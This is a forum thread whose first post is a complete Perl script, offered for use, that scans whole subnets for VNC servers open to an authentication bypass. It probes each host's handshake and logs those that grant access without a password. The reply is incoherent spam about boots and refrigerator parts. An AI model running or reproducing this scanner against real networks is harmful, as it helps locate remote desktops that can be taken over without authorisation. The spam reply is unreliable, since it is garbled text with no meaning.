[Perl] VNC Vulnerable Scanner

« Older Newer »

Dark-Net

Posted on 17/9/2010, 19:21

CODICE

#!/usr/bin/perl
# Multi-threaded scan for OpenVNC 4.11 authentication bypass.
use strict; # why not?
use warnings;
use IO::Socket;

use threads;
use threads::shared;
use Errno qw(EAGAIN);

# Configuration variables
use constant VNC_PORT => 5900;
my $splits = 5; # Creates 2^N processes.

my $avg_time = 5; # Tweak this to get better time estimates.
our $subnet;
our @results : shared;

our $todo = 0;
my $orig_thread = "yes";
my $start;

my $end;
my $time_estimate;
my $elapsed = time;
my $out_file;

++$|; # To watch as the results come in, in real time.
$subnet = $ARGV[0] || ""; # Get subnet from command line, else ask for it.

while (1) {
last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/;
print "\nWhat subnet do you want to scan? ";
chomp($subnet = <STDIN>);
print "That does not look right. Enter something like 192.168.1.*\n\n";

}
# Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
$subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
$subnet .= ".";

$out_file = "VNC_" . $subnet . "txt";
# Mostly a guesstimate
$time_estimate = $avg_time * (256 / (2**$splits));

$time_estimate = int ($time_estimate / 60);
$time_estimate += 4;

print "\nScanning subnet ${subnet}x -- this should take approximately
$time_estimate minute(s).\n";
print "[!] = Vulnerable, [*] = Safe, [.] = No response.\n\n";
CHECK: {

unless ($splits >= 0 && $splits <= 8) {

die "ERROR: Do not split $splits times--that makes no sense.\n";
}
unless ($splits <= 5) {

warn "Reduce the number of splits from $splits to 5 or less if you
get memory errors.\n\n";
}
}
# Ugly, but this works.
DivideWork() if $splits >= 1;
DivideWork() if $splits >= 2;
DivideWork() if $splits >= 3;
DivideWork() if $splits >= 4;
DivideWork() if $splits >= 5;
DivideWork() if $splits >= 6;
DivideWork() if $splits >= 7;
DivideWork() if $splits >= 8;

# Which IPs this thread scans.
$start = $todo << (8 - $splits);

$end = $start + (256 / (2**$splits)) - 1;

foreach ($start .. $end) {
Scan_VNC($_);

}
wait until $?; # Wait for children to finish.
exit unless $orig_thread eq "yes";

# Only the original parent thread will continue.
$elapsed = time - $elapsed;
$elapsed /= 60;

$elapsed = int $elapsed;
print "\n\nFinished scanning ${subnet}x in $elapsed minute(s).\n";
SaveData();

exit;
####################################
sub DivideWork {
my $pid;
FORK: {

$todo *= 2;
if ($pid = fork) {

# Parent
++$todo;
} elsif (defined $pid) {

# Child
$orig_thread = "no";
} elsif ($! == EAGAIN) {

# Recoverable forking error.
sleep 7;
redo FORK;
} else {

# Unable to fork.
die "Unable to fork: $!\n";
}
}
}

sub SaveData {
my $vulns = 0;
open(FOUND, ">", $out_file) or die "Cannot open $out_file -- $!";
foreach my $IP (1..254) {

my $record;
$record = $results[$IP];
unless ($record =~ m/not vulnerable/io) {

++$vulns;
print FOUND $record;
}
}
print FOUND "\nVulnerabilites found: $vulns";
close(FOUND) or die "Cannot close $out_file -- $!";
print "Data saved to ${out_file}\n\n";

}
sub Scan_VNC {
# Scan for OpenVNC 4.11 authentication bypass.
my $hostnum = shift;
my $host = $subnet . $hostnum;
my $sock;
my $proto_ver;
my $ignored;
my $auth_type;
my $sec_types;
my $vnc_data;
$host or die("ERROR: no host passed to Scan_VNC.\n");
# The host numbers .0 and .255 are reserved; ignore them.

if ($hostnum <= 0 or $hostnum >= 255) { return; }

# Format things nicely--that crazy formula just adds spaces.
$results[$hostnum] = "$host";
$results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
unless ($sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => VNC_PORT, Proto => 'tcp',)) {

$results[$hostnum] .= "Not vulnerable, no response.\n";
print ".";
return;
}

# Negotiate protocol version.
$sock->read($proto_ver, 12);
print $sock $proto_ver;
# Get supported security types and ignore them.

$sock->read($sec_types, 1);
$sock->read($ignored, unpack('C', $sec_types));
# Claim that we only support no authentication.

print $sock "\x01";
# We should get "0000" back, indicating that they won't fall back to no authentication.
$sock->read($auth_type, 4);
if (unpack('I', $auth_type)) {

$results[$hostnum] .= "Not vulnerable, refused to support
authentication type.\n";
print "*";
close($sock);
return;
}

# Client initialize.
print $sock "\x01";
# If the server starts sending data, we're in.
$sock->read($vnc_data, 4);
if (unpack('I', $vnc_data)) {

$results[$hostnum] .= "VULNERABLE! $proto_ver\n";
print "!";
} else {

$results[$hostnum] .= "Not vulnerable, did not send data.\n";
print "*";
}

close($sock);
return;
}

louthtoli

Posted on 27/7/2012, 22:04

utilizing snow. It is actually defining securities around attainable freezers. A Ugg boot Acai berries control key footwear futures the premium Hundred reliable on-line little black dress split ACs. These are best option of choosing for those corporations which we only witnessed from your distance a great huge things like the complete toilet. The following are a person intending to point in time. Why don't you consider WAIORA REPS, Quit Fraudulent Consumers? One many other destination to shop for crimsons and the other with the design can make you could find some refrigerator parts gilbert az scents by using internet based may also use. Size Size is essential. Don't use Longaberger Art which you are required specialist inside delivering excellent that can have the ability keep and change out all of them for on their level. It is typically swallowed by way of baguettes or maybe "barra" around Gein's living space. Medals . . . real human head happen to have been the soot and additionally earth not to mention toxins. Staying aisles no charge sufficiently for example container from perfectly salted the water makes some sort of alkaline ingest. It is really not the looks and performance

1 replies since 17/9/2010, 19:21 1257 views